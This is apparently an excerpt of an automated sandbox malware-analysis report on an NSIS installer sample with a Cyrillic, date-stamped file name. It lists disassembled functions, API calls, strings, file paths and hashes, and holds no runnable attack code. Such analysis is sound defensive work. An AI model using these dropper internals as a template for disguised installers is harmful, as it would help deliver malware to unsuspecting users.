                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                                                                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula), ref: 00403B12
                                                                                                                                                                                                                      • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                                                    • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                                                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                                                                                                                                                                                    • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                                                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                    • API String ID: 1975747703-686753906
                                                                                                                                                                                                                    • Opcode ID: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                                                                                                                                                                    • Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2904cd21c70d62866cc327d96625cdd9032e7e4c90c5b4ba07f750359117e74a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402EDD Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 440 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 443 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 440->443 444 402f2d-402f32 440->444 452 403052-403060 call 402e79 443->452 453 402f6b 443->453 445 40310f-403113 444->445 459 403062-403065 452->459 460 4030b5-4030ba 452->460 455 402f70-402f87 453->455 457 402f89 455->457 458 402f8b-402f94 call 403331 455->458 457->458 466 402f9a-402fa1 458->466 467 4030bc-4030c4 call 402e79 458->467 462 403067-40307f call 403347 call 403331 459->462 463 403089-4030b3 GlobalAlloc call 403347 call 403116 459->463 460->445 462->460 490 403081-403087 462->490 463->460 488 4030c6-4030d7 463->488 472 402fa3-402fb7 call 405d6b 466->472 473 40301d-403021 466->473 467->460 478 40302b-403031 472->478 487 402fb9-402fc0 472->487 477 403023-40302a call 402e79 473->477 473->478 477->478 484 403040-40304a 478->484 485 403033-40303d call 406787 478->485 484->455 489 403050 484->489 485->484 487->478 493 402fc2-402fc9 487->493 494 4030d9 488->494 495 4030df-4030e4 488->495 489->452 490->460 490->463 493->478 496 402fcb-402fd2 493->496 494->495 497 4030e5-4030eb 495->497 496->478 498 402fd4-402fdb 496->498 497->497 499 4030ed-403108 SetFilePointer call 405d6b 497->499 498->478 500 402fdd-402ffd 498->500 503 40310d 499->503 500->460 502 403003-403007 500->502 504 403009-40300d 502->504 505 40300f-403017 502->505 503->445 504->489 504->505 505->478 506 403019-40301b 505->506 506->478
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                                                                                      • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                                      • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe", xrefs: 00402EDD
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
                                                                                                                                                                                                                    • soft, xrefs: 00402FCB
                                                                                                                                                                                                                    • C:\Users\user\Desktop, xrefs: 00402F38, 00402F3D, 00402F43
                                                                                                                                                                                                                    • Error launching installer, xrefs: 00402F2D
                                                                                                                                                                                                                    • Inst, xrefs: 00402FC2
                                                                                                                                                                                                                    • C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe, xrefs: 00402EF4, 00402F03, 00402F17, 00402F37
                                                                                                                                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                                                                                                    • Null, xrefs: 00402FD4
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                    • API String ID: 4283519449-621050810
                                                                                                                                                                                                                    • Opcode ID: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                                                                                    • Instruction ID: dd9ea635540f9dffb1b2b479f8e1e5c18960c1b6140bd96a969558b27d112ec4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9da78bb69fdb731252d5033ab884fa182416324aee7ddcf9fc3f40609bcd7e9e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C151F471901205ABDB20AF60DD85B9F7FA8FB0431AF15403BF910B62D5C7789E408BAD
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004062DC Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 720 4062dc-4062e7 721 4062e9-4062f8 720->721 722 4062fa-406310 720->722 721->722 723 406316-406323 722->723 724 406528-40652e 722->724 723->724 725 406329-406330 723->725 726 406534-40653f 724->726 727 406335-406342 724->727 725->724 729 406541-406545 call 4062ba 726->729 730 40654a-40654b 726->730 727->726 728 406348-406354 727->728 731 406515 728->731 732 40635a-406398 728->732 729->730 736 406523-406526 731->736 737 406517-406521 731->737 734 4064b8-4064bc 732->734 735 40639e-4063a9 732->735 740 4064be-4064c4 734->740 741 4064ef-4064f3 734->741 738 4063c2 735->738 739 4063ab-4063b0 735->739 736->724 737->724 747 4063c9-4063d0 738->747 739->738 744 4063b2-4063b5 739->744 745 4064d4-4064e0 call 4062ba 740->745 746 4064c6-4064d2 call 406201 740->746 742 406502-406513 lstrlenW 741->742 743 4064f5-4064fd call 4062dc 741->743 742->724 743->742 744->738 749 4063b7-4063ba 744->749 758 4064e5-4064eb 745->758 746->758 751 4063d2-4063d4 747->751 752 4063d5-4063d7 747->752 749->738 754 4063bc-4063c0 749->754 751->752 756 406412-406415 752->756 757 4063d9-406400 call 406188 752->757 754->747 759 406425-406428 756->759 760 406417-406423 GetSystemDirectoryW 756->760 769 4064a0-4064a3 757->769 770 406406-40640d call 4062dc 757->770 758->742 762 4064ed 758->762 765 406493-406495 759->765 766 40642a-406438 GetWindowsDirectoryW 759->766 764 406497-40649b 760->764 763 4064b0-4064b6 call 40654e 762->763 763->742 764->763 771 40649d 764->771 765->764 768 40643a-406444 765->768 766->765 776 406446-406449 768->776 777 40645e-406474 SHGetSpecialFolderLocation 768->777 769->763 774 4064a5-4064ab lstrcatW 769->774 770->764 771->769 774->763 776->777 779 40644b-406452 776->779 780 406476-40648d SHGetPathFromIDListW CoTaskMemFree 777->780 781 40648f 777->781 782 40645a-40645c 779->782 780->764 780->781 781->765 782->764 782->777
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040641D
                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406430
                                                                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00405359,0041DA00,00000000,0042C228,?,00405359,0042C228,00000000), ref: 0040646C
                                                                                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(0041DA00,Call), ref: 0040647A
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(0041DA00), ref: 00406485
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(Call,00000000,0042C228,?,00405359,0042C228,00000000), ref: 00406503
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                    • API String ID: 717251189-1230650788
                                                                                                                                                                                                                    • Opcode ID: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                                                                                                                                                                    • Instruction ID: 29f0adb049bea166a756856afc1b7ff582c4fdfd81cc2e884c30b49282791dbd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be842abed2e65b63b3d72d51674aff3c14f059aabebd99e4c76d62d1777cce00
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6611071A00111ABDF209F54DC41AAE37A9EF45318F26803FE943BA2D0D77D9AA1C79D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                                      • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Grundlovssikrende36 Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                                                      • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsk21A3.tmp$C:\Users\user\AppData\Local\Temp\nsk21A3.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns$Call
                                                                                                                                                                                                                    • API String ID: 1941528284-2936285393
                                                                                                                                                                                                                    • Opcode ID: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                                                                                                                                                                    • Instruction ID: 24a82d921ca393d09b0f70664e9a68f54f64900ed4cc6ef124b6c19d11fe7a64
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6e6f7bddc079f3ddd16634b2c61c6438f2a5172cea4a8ba22e449da941a997b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12419371900518BACF107BA5DD46DAF3A79EF45368F20423FF422B10E1DA3C8A519A6D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403116 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 913 403116-40312d 914 403136-40313f 913->914 915 40312f 913->915 916 403141 914->916 917 403148-40314d 914->917 915->914 916->917 918 40315d-40316a call 403331 917->918 919 40314f-403158 call 403347 917->919 923 403170-403174 918->923 924 40331f 918->924 919->918 925 4032ca-4032cc 923->925 926 40317a-4031c3 GetTickCount 923->926 927 403321-403322 924->927 928 40330c-40330f 925->928 929 4032ce-4032d1 925->929 930 403327 926->930 931 4031c9-4031d1 926->931 932 40332a-40332e 927->932 933 403311 928->933 934 403314-40331d call 403331 928->934 929->930 935 4032d3 929->935 930->932 936 4031d3 931->936 937 4031d6-4031e4 call 403331 931->937 933->934 934->924 946 403324 934->946 939 4032d6-4032dc 935->939 936->937 937->924 945 4031ea-4031f3 937->945 942 4032e0-4032ee call 403331 939->942 943 4032de 939->943 942->924 951 4032f0-4032fc call 405e62 942->951 943->942 948 4031f9-403219 call 4067f5 945->948 946->930 955 4032c2-4032c4 948->955 956 40321f-403232 GetTickCount 948->956 957 4032c6-4032c8 951->957 958 4032fe-403308 951->958 955->927 959 403234-40323c 956->959 960 40327d-40327f 956->960 957->927 958->939 961 40330a 958->961 962 403244-40327a MulDiv wsprintfW call 405322 959->962 963 40323e-403242 959->963 964 403281-403285 960->964 965 4032b6-4032ba 960->965 961->930 962->960 963->960 963->962 968 403287-40328e call 405e62 964->968 969 40329c-4032a7 964->969 965->931 966 4032c0 965->966 966->930 974 403293-403295 968->974 970 4032aa-4032ae 969->970 970->948 973 4032b4 970->973 973->930 974->957 975 403297-40329a 974->975 975->970
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CountTick$wsprintf
                                                                                                                                                                                                                    • String ID: ... %d%%$@
                                                                                                                                                                                                                    • API String ID: 551687249-3859443358
                                                                                                                                                                                                                    • Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                                                                                                                                                                    • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 976 40264a-402663 call 402c1f 979 402ac5-402ac8 976->979 980 402669-402670 976->980 983 402ace-402ad4 979->983 981 402672 980->981 982 402675-402678 980->982 981->982 984 4027dc-4027e4 982->984 985 40267e-40268d call 40621a 982->985 984->979 985->984 989 402693 985->989 990 402699-40269d 989->990 991 402732-402735 990->991 992 4026a3-4026be ReadFile 990->992 993 402737-40273a 991->993 994 40274d-40275d call 405e33 991->994 992->984 995 4026c4-4026c9 992->995 993->994 996 40273c-402747 call 405e91 993->996 994->984 1005 40275f 994->1005 995->984 998 4026cf-4026dd 995->998 996->984 996->994 1001 4026e3-4026f5 MultiByteToWideChar 998->1001 1002 402798-4027a4 call 406201 998->1002 1001->1005 1006 4026f7-4026fa 1001->1006 1002->983 1008 402762-402765 1005->1008 1009 4026fc-402707 1006->1009 1008->1002 1011 402767-40276c 1008->1011 1009->1008 1010 402709-40272e SetFilePointer MultiByteToWideChar 1009->1010 1010->1009 1012 402730 1010->1012 1013 4027a9-4027ad 1011->1013 1014 40276e-402773 1011->1014 1012->1005 1015 4027ca-4027d6 SetFilePointer 1013->1015 1016 4027af-4027b3 1013->1016 1014->1013 1017 402775-402788 1014->1017 1015->984 1018 4027b5-4027b9 1016->1018 1019 4027bb-4027c8 1016->1019 1017->984 1020 40278a-402790 1017->1020 1018->1015 1018->1019 1019->984 1020->990 1021 402796 1020->1021 1021->984
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                                                                                                                                      • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405EA7
